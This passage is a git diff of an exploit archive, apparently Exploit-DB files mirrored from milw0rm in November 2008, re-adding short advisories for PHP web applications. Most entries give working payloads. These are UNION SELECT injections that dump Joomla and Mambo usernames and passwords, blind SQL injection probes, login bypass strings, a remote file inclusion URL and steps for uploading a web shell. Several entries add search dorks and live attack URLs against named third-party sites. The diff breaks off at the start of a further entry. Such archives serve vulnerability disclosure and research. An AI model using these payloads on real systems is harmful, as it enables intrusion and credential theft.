+	[»] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
+	[»] Type:               [ Free ]
+	[»] Report-Date:        [ 10.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[1][!] Blind SQLi (MQ = off)
+		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
+		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False
+		
+		[../admin/include/newpoll.php]
+		
+			
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-10]
diff --git a/platforms/php/webapps/7089.txt b/platforms/php/webapps/7089.txt
index ef756508c..2839e36d8 100755
--- a/platforms/php/webapps/7089.txt
+++ b/platforms/php/webapps/7089.txt
@@ -1,54 +1,54 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	AJ Classifieds Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ AJ Classifieds Craigs | AJ Classifieds Elite ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.ajclassifieds.net ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 10.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[»] http://localhost/[path]/admin/home.php
-	[»] ...
-	
-
-
-===[ LIVE ]===
-
-	[»] http://ajclassifieds.net/demo/ajlist-craigs/admin/
-	[»] http://ajclassifieds.net/demo/ajlist-elite/admin/
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-11]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	AJ Classifieds Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ AJ Classifieds Craigs | AJ Classifieds Elite ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.ajclassifieds.net ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 10.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[»] http://localhost/[path]/admin/home.php
+	[»] ...
+	
+
+
+===[ LIVE ]===
+
+	[»] http://ajclassifieds.net/demo/ajlist-craigs/admin/
+	[»] http://ajclassifieds.net/demo/ajlist-elite/admin/
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7092.txt b/platforms/php/webapps/7092.txt
index e1eecb058..bc6de671c 100755
--- a/platforms/php/webapps/7092.txt
+++ b/platforms/php/webapps/7092.txt
@@ -1,30 +1,30 @@
-#######################################################
-Joomla com_books(book_id) SQL injection Vulnerability
-#######################################################
-
-
-###################################################
-#[~] Author :  boom3rang 
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name:  com_books
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"com_books"
-##################################################
-
-#[~] Example:  
-http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]
-
-
-#[~]Exploit:  
--9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+#######################################################
+Joomla com_books(book_id) SQL injection Vulnerability
+#######################################################
+
+
+###################################################
+#[~] Author :  boom3rang 
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name:  com_books
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"com_books"
+##################################################
+
+#[~] Example:  
+http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]
+
+
+#[~]Exploit:  
+-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7093.txt b/platforms/php/webapps/7093.txt
index 1ad0a1e77..776e1c51e 100755
--- a/platforms/php/webapps/7093.txt
+++ b/platforms/php/webapps/7093.txt
@@ -1,32 +1,32 @@
-###########################################################
-Joomla com_contactinfo(catid) SQL-injection vulnerability
-###########################################################
-
-###################################################
-#[~] Author :  boom3rang 
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name:  com_contactinfo
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"com_contactinfo"
-##################################################
-
-
-#[~] Example:                  
-http://localhost/Path/index.php?option=com_contactinfo&catid=[exploit]
-
-#[~] Exploit: 
--9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
-
-#[~] LiveDemo:
-http://www.planetacentr.ru/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
-
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+###########################################################
+Joomla com_contactinfo(catid) SQL-injection vulnerability
+###########################################################
+
+###################################################
+#[~] Author :  boom3rang 
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name:  com_contactinfo
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"com_contactinfo"
+##################################################
+
+
+#[~] Example:                  
+http://localhost/Path/index.php?option=com_contactinfo&catid=[exploit]
+
+#[~] Exploit: 
+-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
+
+#[~] LiveDemo:
+http://www.planetacentr.ru/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users/*
+
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7094.txt b/platforms/php/webapps/7094.txt
index 6ee358ce0..90064f7bc 100755
--- a/platforms/php/webapps/7094.txt
+++ b/platforms/php/webapps/7094.txt
@@ -1,19 +1,19 @@
-Pre Real Estate Listings (login.php) ByPass /File Upload
-Script:Pre Real Estate Listings
-HomePage:http://preproject.com/
-Demo:http://preproject.com/ulisting/
-Author:BackDoor
-By Pass Exploit:
-http://victim.com/scriptpath/login.php username:'or' password:'or'
-Live Demo:
-http://preproject.com/ulisting/login.php
-File Upload Exploit:
-login live demo username:'or' password:'or'
-Edit Your Profile Link:http://preproject.com/ulisting/profile.php
-Upload Your Shell:
-Example:
-http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
- 
-Cyber-Security TIM //Lojistik
-
-# milw0rm.com [2008-11-11]
+Pre Real Estate Listings (login.php) ByPass /File Upload
+Script:Pre Real Estate Listings
+HomePage:http://preproject.com/
+Demo:http://preproject.com/ulisting/
+Author:BackDoor
+By Pass Exploit:
+http://victim.com/scriptpath/login.php username:'or' password:'or'
+Live Demo:
+http://preproject.com/ulisting/login.php
+File Upload Exploit:
+login live demo username:'or' password:'or'
+Edit Your Profile Link:http://preproject.com/ulisting/profile.php
+Upload Your Shell:
+Example:
+http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
+ 
+Cyber-Security TIM //Lojistik
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7095.txt b/platforms/php/webapps/7095.txt
index 3bf2c0765..c96a60cac 100755
--- a/platforms/php/webapps/7095.txt
+++ b/platforms/php/webapps/7095.txt
@@ -1,33 +1,33 @@
-####################################################################
-Joomla & Mambo com_catalogproduction (id) SQL injection vulnerability!
-####################################################################
-
-###################################################
-#[~] Author :  boom3rang 
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-#[!] Module_Name:  com_catalogproduction
-#[!] Script_Name:  Joomla & Mambo
-#[!] Google_Dork:  inurl:"com_catalogproduction"
-##################################################
-
-
-#[~] Example:                  
-http://localhost/Path/index.php?option=com_catalogproduction&task=viewdetail&id=[exploit]
-
-
-#[~]Joomla Exploit:  
--9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users
-
-
-#[~]Mambo  Exploit:
--9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+mos_users
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-11-11]
+####################################################################
+Joomla & Mambo com_catalogproduction (id) SQL injection vulnerability!
+####################################################################
+
+###################################################
+#[~] Author :  boom3rang 
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+#[!] Module_Name:  com_catalogproduction
+#[!] Script_Name:  Joomla & Mambo
+#[!] Google_Dork:  inurl:"com_catalogproduction"
+##################################################
+
+
+#[~] Example:                  
+http://localhost/Path/index.php?option=com_catalogproduction&task=viewdetail&id=[exploit]
+
+
+#[~]Joomla Exploit:  
+-9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users
+
+
+#[~]Mambo  Exploit:
+-9999 union all select 1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+mos_users
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7096.txt b/platforms/php/webapps/7096.txt
index 6e75d3701..8802bccd0 100755
--- a/platforms/php/webapps/7096.txt
+++ b/platforms/php/webapps/7096.txt
@@ -1,44 +1,43 @@
-
-================================================================================================================================
-
-
-  [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
-
-       Software : com_rssreader version 1.0
-       Vendor   : http://www.joomlashop.dk/
-       Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_rssreader/admin.rssreader.php
-
-        include( "$mosConfig_live_site/components/com_rssreader/about.html" );
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]
-
-
-================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-================================================================================================================================
-
-# milw0rm.com [2008-11-11]
+================================================================================================================================
+
+
+  [o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
+
+       Software : com_rssreader version 1.0
+       Vendor   : http://www.joomlashop.dk/
+       Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_rssreader/admin.rssreader.php
+
+        include( "$mosConfig_live_site/components/com_rssreader/about.html" );
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]
+
+
+================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+================================================================================================================================
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7097.txt b/platforms/php/webapps/7097.txt
index da6b1a15a..23bd8bc6d 100755
--- a/platforms/php/webapps/7097.txt
+++ b/platforms/php/webapps/7097.txt
@@ -1,34 +1,34 @@
-###########################################################
-Joomla com_marketplace(catid) SQL-injection vulnerability
-###########################################################
-
-###################################################
-#[~] Author :  TR-ShaRk
-#[~] Msn : Starhack@tr-shark.org
-#[~] Im Not Hacker
-#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
-#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
-
-#[!] Module_Name:  com_marketplace
-#[!] Script_Name:  Joomla
-#[!] Google_Dork:  inurl:"com_marketplace"
-#[!] Script Download:  http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
-##################################################
-
-
-#[~] Example:
-http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
-
-#[~] Exploit:
-9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
-
-
-#[~] LiveDemo:
-http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
-
-
-###############################
-Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik
-###############################
-
-# milw0rm.com [2008-11-11]
+###########################################################
+Joomla com_marketplace(catid) SQL-injection vulnerability
+###########################################################
+
+###################################################
+#[~] Author :  TR-ShaRk
+#[~] Msn : Starhack@tr-shark.org
+#[~] Im Not Hacker
+#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
+#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
+
+#[!] Module_Name:  com_marketplace
+#[!] Script_Name:  Joomla
+#[!] Google_Dork:  inurl:"com_marketplace"
+#[!] Script Download:  http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
+##################################################
+
+
+#[~] Example:
+http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
+
+#[~] Exploit:
+9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
+
+
+#[~] LiveDemo:
+http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
+
+
+###############################
+Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik
+###############################
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7098.txt b/platforms/php/webapps/7098.txt
index 08c5bf9cc..1352ffd04 100755
--- a/platforms/php/webapps/7098.txt
+++ b/platforms/php/webapps/7098.txt
@@ -1,52 +1,52 @@
-|___________________________________________________
-|
-| Business Directory Script ( cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script :  http://www.pozscripts.com/product_details.php?item_id=6
-|
-| DorK   :  :) 
-|___________________________________________________
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--
-
-
-
-Demo
-________
-
-http://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user
-
-(),0x3e,version()),3,4,5--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-11]
+|___________________________________________________
+|
+| Business Directory Script ( cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script :  http://www.pozscripts.com/product_details.php?item_id=6
+|
+| DorK   :  :) 
+|___________________________________________________
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--
+
+
+
+Demo
+________
+
+http://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user
+
+(),0x3e,version()),3,4,5--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7101.txt b/platforms/php/webapps/7101.txt
index 1118fceb6..367d3e24c 100755
--- a/platforms/php/webapps/7101.txt
+++ b/platforms/php/webapps/7101.txt
@@ -1,58 +1,58 @@
-[~] AlstraSoft SendIt Pro Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: "Powered by AlstraSoft SendIt Pro"
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-you save your shell like this: shell.php.pjpeg
-
-warning: filetype not php.jpeg 
-
-like this: filetype: php.pjpeg 
-
-after you go site 
-
-Recipients' e-mail address: write anything
-
-Select file : select your_shell.php.pjpeg
-
-Your e-mail address: email
-
-Message to send to recipient : write anything
-
-and click to send button after you see link and clik to that link
-
-you go your_shell.php.pjpeg :
-
-localhost/script/send/files/[id]shell.php.pjpeg
-
-example for demo:
-
-http://www.blizsoft.com/send/files/84019shell.php.pjpeg
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft SendIt Pro Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: "Powered by AlstraSoft SendIt Pro"
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+you save your shell like this: shell.php.pjpeg
+
+warning: filetype not php.jpeg 
+
+like this: filetype: php.pjpeg 
+
+after you go site 
+
+Recipients' e-mail address: write anything
+
+Select file : select your_shell.php.pjpeg
+
+Your e-mail address: email
+
+Message to send to recipient : write anything
+
+and click to send button after you see link and clik to that link
+
+you go your_shell.php.pjpeg :
+
+localhost/script/send/files/[id]shell.php.pjpeg
+
+example for demo:
+
+http://www.blizsoft.com/send/files/84019shell.php.pjpeg
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7102.txt b/platforms/php/webapps/7102.txt
index f7fb796b9..11da559c4 100755
--- a/platforms/php/webapps/7102.txt
+++ b/platforms/php/webapps/7102.txt
@@ -1,46 +1,46 @@
-[~] AlstraSoft Article Manager Pro auth bypass
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-localhost/script/admin/admin.php
-
-username: ' or ' 1=1--
-
-password: ZoRLu
-
-
-
-admin login for demo:
-
-http://www.blizsoft.com/article/admin/admin.php
-
-username: ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft Article Manager Pro auth bypass
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+localhost/script/admin/admin.php
+
+username: ' or ' 1=1--
+
+password: ZoRLu
+
+
+
+admin login for demo:
+
+http://www.blizsoft.com/article/admin/admin.php
+
+username: ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7103.txt b/platforms/php/webapps/7103.txt
index b092a2d5c..d5880c857 100755
--- a/platforms/php/webapps/7103.txt
+++ b/platforms/php/webapps/7103.txt
@@ -1,43 +1,43 @@
-[~] AlstraSoft Web Host Directory auth bypass
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-username: ZoRLu
-
-password: ' or ' 1=1--
-
-
-admin login for demo:
-
-http://www.hyperstop.com/demo/webhost/
-
-username: ZoRLu
-
-password: ' or ' 1=1--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft Web Host Directory auth bypass
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+username: ZoRLu
+
+password: ' or ' 1=1--
+
+
+admin login for demo:
+
+http://www.hyperstop.com/demo/webhost/
+
+username: ZoRLu
+
+password: ' or ' 1=1--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7105.txt b/platforms/php/webapps/7105.txt
index 3f3f0409c..35ea293ba 100755
--- a/platforms/php/webapps/7105.txt
+++ b/platforms/php/webapps/7105.txt
@@ -1,58 +1,58 @@
-|___________________________________________________
-|
-| Quick Poll (code.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|
-|    Author: Hussin X
-|
-|    Home :  http://www.iq-ty.com/
-|
-|    email:  darkangel_g85@Yahoo.com
-|
-|
-|___________________________________________________
-|
-| script :http://discountedscripts.com/product_info.php?products_id=69
-|
-|___________________________________________________
-
-Exploit:
-________
-
-
-Admin Name :
-
-www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
-
-
-______________________
-
-table_name : column_name
-
-answers : poll
-codes : poll
-comments : poll
-voted : poll
-
-
-______________________
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
-
-
-
-
-# EnD
-
-Im IRAQi
-
-# milw0rm.com [2008-11-12]
+|___________________________________________________
+|
+| Quick Poll (code.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|
+|    Author: Hussin X
+|
+|    Home :  http://www.iq-ty.com/
+|
+|    email:  darkangel_g85@Yahoo.com
+|
+|
+|___________________________________________________
+|
+| script :http://discountedscripts.com/product_info.php?products_id=69
+|
+|___________________________________________________
+
+Exploit:
+________
+
+
+Admin Name :
+
+www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
+
+
+______________________
+
+table_name : column_name
+
+answers : poll
+codes : poll
+comments : poll
+voted : poll
+
+
+______________________
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
+
+
+
+
+# EnD
+
+Im IRAQi
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7106.txt b/platforms/php/webapps/7106.txt
index 8eb6a3c44..948b38aed 100755
--- a/platforms/php/webapps/7106.txt
+++ b/platforms/php/webapps/7106.txt
@@ -1,55 +1,55 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
